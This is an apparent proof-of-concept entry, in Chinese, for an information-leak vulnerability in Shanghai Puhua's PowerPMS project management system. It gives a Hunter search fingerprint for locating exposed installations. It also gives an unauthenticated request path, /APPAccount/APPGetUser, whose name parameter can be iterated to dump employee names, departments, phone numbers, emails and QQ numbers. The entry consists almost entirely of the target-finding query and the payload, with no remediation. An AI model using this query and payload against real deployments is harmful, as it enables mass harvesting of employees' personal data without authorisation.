S10-1上海普华科技发展股份公司-PowerPMS-InformationLeakage

漏洞描述：

上海普华科技发展股份有限公司PowerPMS存在信息泄露漏洞，泄露大量员工信息泄露，包括员工的姓名，所在部门信息，手机号，邮箱，有的还包含QQ号等重要信息。

网站图片:

网络测绘:

Hunter 语法:

• hunterweb.body=“–二维码登陆样式–“&&web.body=“–二维码登陆JS–”

漏洞复现:

可以遍历name的值获取其他信息
payload：

/APPAccount/APPGetUser?name=1   

效果图: